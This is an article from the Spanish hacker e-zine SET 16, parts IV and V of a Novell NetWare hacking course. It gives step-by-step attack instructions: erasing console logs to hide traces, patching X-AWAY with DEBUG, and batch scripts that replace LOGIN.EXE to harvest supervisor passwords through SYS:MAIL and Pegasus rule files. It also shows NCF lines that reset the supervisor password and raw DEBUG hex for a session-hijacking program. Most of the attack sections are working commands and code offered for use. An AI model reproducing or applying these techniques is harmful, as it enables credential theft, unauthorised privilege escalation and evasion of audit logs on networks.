SET 39 Call For Papers

¿Eres un hacker? Si deseas pasar a formar parte de la historia del hacking hispano, colabora con la próxima edición de SET 39 enviándonos un artículo. No esperes más, esta es tu oportunidad de demostrar lo que sabes. Ayúdanos a construir una revista de hackers para hackers. SET Staff

SET 16

58616 visitas

Curso de Novell Netware -IV- y -V-

      2937

Autor: Madfran
-[ 0x0E ]--------------------------------------------------------------------
-[ CURSO DE NOVELL NETWARE -IV- Y -V- ]--------------------------------------
-[ by MadFran ]-------------------------------------------------------SET-16-

Cuarto capitulo sobre Novell Netware

Capitulo - 04 LA CONSOLA


04-1 Como evitar los registros de consola.

Necesitamos acceso a la consola y privilegios de super. La red debe tener
3.11 o superior y que funcione CONLOG.NLM. Cualquier red en estas condiciones
graba todos los mensajes en un archivo. Si lanzas SETPWD desde la consola, la
respuesta se graba en el archivo log. Aqui estan los pasos para determinar
si esta activada y como evitarlo.

      - Teclea MODULES en la consola, busca CONLOG.NLM, si lo encuentras....
        esta activo.
      - Busca CONSOLE.LOG en SYS:ETC. Es un fichero de texto que se puede
        mirar pero no editar ni borrar si CONLOG esta activo.
      - Unload CONLOG en la consola.
      - Borra, o mejor edita CONSOLE.LOG, borrando tus rastros.
      - Carga CONLOG. Te dara un mensaje.
      - Lanza PURGE desde SYS:ETC para borrar viejas versiones de CONSOLE.LOG
        que tu editor puede haber dejado.


04-2 Se puede utilizar la password de RCONSOLE para que trabaje como Super ?

Si y no. En version 3.x, la password del super siempre funciona.

Un error frecuente acerca de la password del super en 3.x es utilizar un
switch para que solo lo utilice la password del super.
Funciona asi :

LOAD REMOTE /P=

en lugar de

LOAD REMOTE RCONPASSWORD

El admin piensa que /P= desconecta a cualquier menos a super para RCONSOLE.
De hecho la password se queda en /P=, dejandote entrar.

El segundo error mas frecuente es utilizar -S

La version 4.1 es un poco diferente. Funciona de la forma siguiente :

      - En la consola teclea REMOTE SECRET, donde SECRET es la password de la
        consola.
      - Teclea REMOTE ENCRYPT. Te pedira una password para encriptar.
      - Esto te dara la version encriptada del password, y te dara la opcion
        de escribir LDREMOTE.NCF en el directorio SYS:SYSTEM, conteniendo
        todas las entradas que soportan la carga del Remote Console.
      - Se puede lanzar LDREMOTE a partir de tu AUTOEXEC.NCF, o puedes
        cambiar la linea LOAD REMOTE en AUTOEXEC.NCF de la forma siguiente:

             LOAD REMOTE SECRET
             se convierte en
             LOAD REMOTE -E 870B7E366363

Otra nota.
Para asegurar que el password de super funcione con RCONSOLE (4.02 o
superior), a¤ade el switch para ocultar -US

LOAD REMOTE -E 870B7E366363 -US

Otro switch no documentado es -NP, que significa sin password.


04-3 Como puede evitar el bloqueo de MONITOR

Hay un camino facil y sencillo para hacerlo para hacerlo en 3.11 si tienes un
servidor de impresion.
He aqui la explotacion del bug en 3.11

      - Utiliza PCONSOLE para parar el servidor de impresion. Esto provoca
        que la ventana del monitor vaya a la ventana de la impresion y espera
        el enter para salir de la ventana.

PCONSOLE se lanza sin ninguna dificultad, pero una vez dentro no he encontrado
ninguna opcion para parar el servidor.

      - Vete a la ventana de la consola y teclea UNLOAD MONITOR.

      - Mira en AUTOEXEC.NCF la linea PSERVER.NLM y manualmente vuelve a
        cargar PSERVER.NLM

Tanto en 3.x como en 4.x, intenta los pasos de la seccion 02-6.
Puedes probar cualquier password en la consola desbloqueada adema de
desconectar la proteccion de password en 3.x



Quinto capitulo sobre Novell Netware

Capitulo - 05 ACCESOS A ARCHIVOS Y DIRECTORIOS


05-1 Como puedo ver archivos y directorios ocultos.

En lugar del comando normal DIR, utiliza NDIR (facil, no?).
NDIR *.* /S /H te permitira ver tambien los archivos de sistema.


05-2 Como puedo evitar el flag "execute-only"

Si un archivo esta marcado como solo para ejecutar, todavia es posible
abrirlo. Abre el archivo con un programa que lea ejecutables y grabalo en
otro directorio.

Tambien puedes probar X-AWAY.EXE para eliminar esta marca si el programa
FLAG.EXE de Novell no puede hacerlo. Pero, de nuevo, X-AWAY.EXE solo funciona
con privilegios de super.

Para desactivar el chequeo de accesos de super en X-AWAY, intenta lo
siguiente :

        REN X-AWAY.EXE WORK
        DEBUG WORK
        EB84 EB
        W
        Q
        REN WORK X-AWAY.EXE

Listo ! Cualquiera puede copiar archivos de solo ejecucion. El unico problema
es que necesitas practicamente derechos totales en el directorio donde
residen los archivos.


05-3 Como ocultar nuestra presencia despues de alterar archivos

El mejor metodo es usar Filer. Pasos a seguir para eliminar alteraciones de
archivos.

     - Lanza Filer o utiliza NDIR y apunta los atributos del archivo objetivo,
       sobre todo la fecha y propietario del archivo.
     - Realiza los cambios en el archivo.
     - Lanza Filer o utliza NDIR para ver si los atributos han cambiado. Si
       es asi, vuelvelos a sus valores originales.

Pulsando F1 en Filer, tendras toda la ayuda en linea que necesites, el camino
mas rapido es lanzar Filer en el directorio donde esta el archivo, marcarlo
y pulsar enter, seleccionando File Options y despues View/Set File
Information. View y Edit y lo que desees.


05-4 Que es un troyano de Netware

Un troyano de Netware es un programa que supuestamente hace una cosa pero
realmente hace otra, y esto utilizando las utilidades API de Netware. Yo
nunca me he encontrado personalmente uno, pero asi es como en teoria
funcionan.

     - El troyano se coloca en una terminal a ser posible que utilice el
       administrador. El troyano se puede llamar algo parecido a CHKVOL.COM o
       VOLINFO.COM, que es un nombre real pero con extension COM. Se tiene
       que colocar en el path de la estacion de trabajo.

     - Cuando se ejecuta, el troyano utiliza las llamadas API para determinar
       si la persona conectada tiene derechos de super, si no es asi pasa a
       la siguiente tarea. En caso contrario se ejecuta alguna accion para
       romper la seguridad.

     - Despues se ejecuta CHKVOL.EXE o VOLINFO.EXE real como si nada.

La rotura de la seguridad tipicamente lo hace algun tipo de actividad de
comando en linea que deberia ejecutarse por las llamadas del sistema.
Por ejemplo, PROP.EXE podria ejecutarse para construir una propiedad y
reemplazar LOGIN.EXE copiandolo en el server en el directorio SYS:LOGIN.
O RW que permite acceso al SYS:SYSTEM para no-super usuarios como si fuera
GUEST. Una vez activado el troyano se puede borrar a si mismo.


05-5 Que son los Trustee Diretory Assignments.

Lan God ha se¤alado que los Trustee Directory Assignements son los servicios
peor entendidos y mal configurados de Novell Netware. Tipicamente un sitio
seguro deberia tener Read y File Scan solo en pocos directorios, y no deberia
tener ningun derecho en el directorio raiz de ningun directorio. Se pueden
asignar derechos via el filtro Trustee Directory Assignements hacia abajo en
el arbol del directorio, de forma que si un usuario tiene acceso de escritura
en el directorio raiz, tambien tendra dichos derechos en todos los
directorios que se encuentren debajo (a no ser que explicitamente se limite
el derecho).
Los derechos no estan localizados en el bindery, sino en cada volumen.

A continuacion una breve descripcion de Trustees y Trustee Directory
Assignements copiados de : COMP.OS.NETWARE.SECURITY, FAQ

Un "Trustee" es cualquier usuario o grupo que tiene derechos de acceso en un
directorio. Los derechos de acceso son ligeramente distintos en Netware 2 que
en 3.

S - Supervisor. Cualquier usuario con derechos de supervisor en un directorio
    tendra todos los demas derechos, esten o no explicitamente declarados.
    Las cuentas con derechos de Supervisor conservaran estos derechos en
    cualquier directorio.

R - Leer. Da derechos de lectura de archivos.

C - Crear. Permite crear archivos y directorios. A no ser que tenga derechos
    de escritura, no podra editar los archivos que han sido creados.

W - Escribir. Permite al usuario hacer cambios en archivos. A no ser que
    tengan tambien derechos de creacion, no podras editarlos, ya que las
    operaciones de escritura solo pueden usarse para ampliar archivos (no
    truncarlos, cosa que hacen los editores normales).

E - Borrar. Permite borrar y eliminar archivos.

M - Modificar. Permite modificar atributos de archivos.

F - Mirar. Permite al usuario ver informacion de archivos y directorios. Si
    un usuario no tiene derechos de mirar, no tendra evidencia alguna de la
    existencia de los archivos.

A - Control de acceso. Permite al usuario cambiar los derechos. Le permitira
    dar accesos tipo A a otros, quitar derechos y revocar derechos
    especificos. El unico problema es que es incluso posible quitar derechos
    de si mismo, con lo cual,...los pierdes.

Esto es como hacer el organigrama de tu empresa y.... no ponerte.


05-6 Explotacion de alguna asignacion de derechos

Hay dos formas. En 3.x el grupo EVERYONE tiene derechos en SYS:MAIL. Esto
significa que el usuario (incluso GUEST) puede escribir archivos en cualquier
subdirectorio en SYS:MAIL.

No es totalmente cierto. Puedes escribir en los directorios que tienes
derechos. Estos varian en funcion de lusuario

Las primeras versiones de Netware incluian un sencillo paquete de mail, y
todo nuevo usuario tiene un subdirectorio en MAIL con derechos RRCWEMF, con
su numero de identificacion. Un numero importante es el 1, que pertenece al
supervisor. Aqui hay un sistema de explotarlo.

TRUCO No 1
----------

- Login como GUEST y cambia al directorio SYS:MAIL
  (En realidad cualquier directorio es bueno)

- Teclea DIR. Veras un subdirectorio, este es el que pertenece a GUEST. 
  Cambia a este subdirectorio (Por ejemplo C0003043)

- Teclea DIR. Si no hay ningun archivo llamado LOGIN, puedes proseguir.
  Si hay algun archivo LOGIN, incluso vacio, no puedes hacerlo.

- Copia la version itsme de PROP.EXE y LOGIN.EXE en el directorio
  SYS:MAIL\C0003043.

- Crea un archivo batch (llamalo BOM.BAT) en este directorio, con el
  siguiente contenido.

   @ECHO OFF
   FLAG \LOGIN\LOGIN.EXE N > NUL *REM Cambia los atributos de LOGIN a Normal
   COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
   FLAG \LOGIN\LOGIN.EXE SRO > NUL *REM Cambia a S (Compartible)
   RO (Solo Lectura)
   \MAIL\C0003043\PROP -C > NUL

- Crea un archivo LOGIN.BAT con el contenido siguiente.

   MAP DISPLAY OFF
   MAP ERRORS OFF
   MAP G:=3DSYS:
   G: * REM En algun sistema DRIVE G:
   COMMAND /C #\MAIL\1\BOMB
   F: * REM En algun sistema DRIVE F:
   MAP DELETE G:

- Ahora copia los archivos en el directorio del supervisor desde el drive
  mapeado al volumen SYS:

   TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
   TYPE LOGIN > \MAIL\1\LOGIN

Como no tengas derechos de supervisor, esto no hay quien lo haga

La proxima vez que el supervisor se conecte el archivo LOGIN.EXE original es
reemplazado y se ejecuta PROP.EXE, capturando passwords. Lanza PROP mas tarde
para cosechar los passwords cazados. Tendras todos los passwords (incluidos
los del supervisor). No te olvides de borrar los archivos LOGIN y BOMB.BAT.
El administrador puede evitar esto creando login scripts personales o
a¤adiendo un comando EXIT al final del System Login Scrip. Las ultimas
versiones de Netware crean un archivo LOGIN vacio en los directorios
SYS:MAIL.

TRUCO No 2
----------

Pegasus mail tiene un fallo que lo enlaza con los derechos de creacion en
SYS:MAIL. He aqui como usarlo :

- Creas un archivo RULES.PMQ que lanza un programa despues de recibir un
  mensaje mail. El programa es algo parecido a esto.

   COMMAND /C F:\MAIL\1\BOMB.BAT

- Supongamos que tu directorio mail es SYS:MAIL\C0003043. Copia PROP.EXE
  y LOGIN.EXE (version istme) en este directorio.

- Tu BOMB.BAT deberia ser algo asi.

   @ECHO OFF
   FLAG \LOGIN\LOGIN.EXE N > NUL
   COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
   FLAG \LOGIN\LOGIN.EXE SRO > NUL
   \MAIL\C0003043\PROP -C > NUL

- Cuando el super lea el mail, se activa LOGIN.EXE y empieza a capturar
  passwords. Despues de adquirir derechos super, borra los archivos de
  SYS:MAIL\1

Este truco solo funciona si RULES.PMQ no existe en el directorio destino.


TRUCO #2a
---------

Si RULES.PMQ existe, no puedes hacerlo, ya que solo puedes crear archivos
nuevos en este directorio. Pero hay una posibilidad de que super lo haga por
ti.

- Crea extra reglas para Pegasus. Llamalas desde RULEA.PMQ hasta RULER.PMQ,
  y de RULET.PMQ hasta RULEZ.PMQ.

- La proxima vez que super se conecte, le dara un error.

- Intentara corregirlo borrando RULE?.PMQ,... y de paso borrara RULES.PMQ.

- Ahora puedes ir al TRUCO 2.


05-7 Algunas reglas generales sobre derechos.

Para ver tus derechos, utiliza el comando WHOAMI /R. A contimuacion un
resumen de los derechos mas comunes y su proposito. Donde aparece x,
significa que es igual la letra que aparece.

[SRCWEMFA] Significa que tienes todos los derechos.

[Sxxxxxxx] Solo aparece si eres supervisor o equivalente. Significa que
           tienes acceso pleno en este directorio y todos los subdirectorios.
           No puedes ser excluido de ningun subdirectorio aunque otro usuario
           explicitamente lo declare.

[xxxxxxxA] Es lo mejor despues de super. Significa que tienes control en
           todos los directorios y subdirectorios. Te pueden revocar los
           derechos en un subdirectorio pero siempre los puedes recuperar
           mediante herencias.

[_R____F_] Solo derechos de lectura. Tipico para directorios de software.

[_RCWEMFx] Lo que normalmente se tiene en el directorio propio. Si encuentras
           algun directorio con estos derechos, se puede utilizar para
           archivar ficheros (y saltarte las limitaciones de espacio).

[_RxW__Fx] Normalmente para archivos log. A no ser que tengas derechos C, no
           es posible editar los archivos en este directorio.

El comando RIGHTS te dira los derechos que tienes en un directorio en 
particular. GRANT, REMOVE y REVOKE se utilizan para dar derechos.


05-8 Como puede ayudarte el acceso a los archivos NCF

El acceso a algun fichero .NCF puede evitar la seguridad, ya que
tradicionalmente estos archivos se lanzan desde la consola y se asume que
hay seguridad de acceso a la consola. La adicion de algunas lineas a alguno
de estos archivos te puede dar acceso al sistema.

El mas vulnerable es el AUTOEXEC.NCF. A¤adir un par de lineas para lanzar
BURGLAR.NLM o SETPWD.NLM te dara acceso sin duda. Pero recuerda que hay
otros archivos que te pueden ayudar. Por ejemplo ASTART.NCF y ASTOP.NCF
se usan para lanzar y parar Arcserve, el sistema mas popular de backup para
Netware. El archivo LDREMOTE.NCF, mencionado en el capitulo 04-2 es otro
objetivo potencial.

Las lineas que puedes a¤adir a archivos como estos son :

UNLOAD CONLOG
LOAD SETPWD SUPERVISOR SECRET
CLS
LOAD CONLOG

Se asume que tienes derechos de lectura y escritura en el sitio donde tienes
los archivos NCF y puedes copiar SETPWD.NLM en el server. Ten presente que
desmontando CONLOG solo cubriras tus trazas de forma parcial, en el archivo
CONSOLE.LOG sera obvio que CONLOG ha sido montado y desmontado. El comando
CLS es para borrar tus actividades de la pantalla de la consola.

El mejor NCF para esto es obviamente uno que se utilice durante el arranque
o durante operaciones automaticas. De esta forma un corto NCF y sus
actividades escaparan a los ojos del administrador.


05-9 Puede alguien hacer logout y tu aprovecharse de ello ?

Si, he aqui como.

Teclea el siguiente comando directamente en el DOS.

debug boo.com
e100 eb 2b 80 fc d7 74 22 3d 02 f1 74 1d 3d 19 f2 74
e110 18 3d 17 f2 74 0a 3d 17 f2 74 05 ea 5b 46 4d 5d
e120 50 b0 d2 38 45 02 58 75 f2 f8 ca 02 00 b4 49 8e
e130 06 2c 00 cd 21 b8 21 35 cd 21 89 1e 1c 01 8c 06
e140 1e 01 b8 21 25 ba 02 01 cd 21 ba 2d 01 cd 27 00
rcx
50
w
q

Lanza esto en un terminal (Net 3.x o 2.x), y espera que alguien lo utilice
y despues se desconecte y lo abandone,.....Ooops.. aparentemente ha olvidado
hacer bien el logout.

Moraleja : Si utilizas una red con terminales publicos, ademas de logout
apaga el terminal al irte.


05-10 Otros programas que dan demasiados accesos

Netware NFS tiene varios bugs (ver seccion 07-6), asi como IntraNetware
(seccion 12)

Para accesos remotos, los hackers siempre buscan un Shiva. Mira, si un hacker
tiene el nombre de una cuenta, no le hace falta nombre de usuario ni password
para conectarse. Si un usuario de Shiva desconecta sin hacer logout, la
proxima persona que acceda tendra los derechos de la anterior. Shiva no 
desconecta correctamente la conexion.

Shiva es un sistema multimodem muy comun para acceder telefonicamente a
las empresas


05-11 Como puedo evitar los limites de espacio en disco

Algunos administradores olvidan implementar restricciones en algunos
volumenes, pero dan accesos de escritura a todos. Esto permite utilizar mas
recursos de los previstos.

Algunos sistemas mantienen directorios en un volumen, y solo aplican
restricciones en este volumen. Aplicaciones y archivos de sistema se pueden
colocar en otros volumenes. Ya que algunas aplicaciones requieren derechos
de escritura en estos directorios, si no se limita el espacio, algunos
usuarios capaces de lanzar el programa pueden utilizar el espacio disponible
(Microsoft Mail y su volumen ..) Es el caso del SYS:MAIL\xxx.